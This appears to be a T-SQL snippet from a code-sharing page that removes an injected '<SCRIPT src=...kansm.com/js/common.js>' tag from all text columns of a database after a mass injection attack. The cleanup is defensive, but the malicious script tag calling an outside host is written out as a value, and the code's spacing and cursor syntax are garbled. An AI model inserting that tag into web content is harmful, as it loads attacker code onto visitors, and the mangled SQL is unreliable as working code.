CopyCode The Code is as follows: declare @ delstr nvarchar (500)
Set @ delstr = '<SCRIPT src = http://www.kansm.com/js/common.js> </SCRIPT>' -- the injected field string
/*************************************** */
************/
Set nocount on
Declare @ tablename nvarchar (100), @ columnname nvarchar (100), @ tbid int, @ irow int, @ iresult int
Declare @ SQL nvarchar (2000)
Set @ iresult = 0
Declare cur cursor
Select name, ID from sysobjects where xtype = 'U'
Open cur
Fetch next from cur into @ tablename, @ tbid
While @ fetch_status = 0
Begin
Declare cur1 cursor
Select name from syscolumns where xtype in (231,167,239,175, 35, 99) and ID = @ tbid
Open cur1
Fetch next from cur1 into @ columnname
While @ fetch_status = 0
Begin
Set @ SQL = 'Update ['+ @ tablename +'] Set ['+ @ columnname +'] = substring (['+ @ columnname +'], '+' 1, patindex (''% '+ @ delstr +' %'', ['+ @ columnname +'])-1) + '+ 'substring ([' + @ columnname + '], patindex (''%' + @ delstr + '%'', [' + @ columnname + ']) + '+ 'len (''' + @ delstr + '''), datalength ([' + @ columnname + ']) where ['+ @ columnname +'] Like ''% '+ @ delstr +' % '''
Exec sp_executesql @ SQL
Set @ irow = @ rowcount
Set @ iresult = @ iresult + @ irow
If @ irow> 0
Begin
Print 'table: '+ @ tablename +', column: '+ @ columnname +' updated '+ convert (varchar (10), @ irow) + 'records ;'
End
Fetch next from cur1 into @ columnname
End
Close cur1
Deallocate cur1
Fetch next from cur into @ tablename, @ tbid
End
Print 'database total '+ convert (varchar (10), @ iresult) +' records updated !!! '
Close cur
Deallocate cur
Set nocount off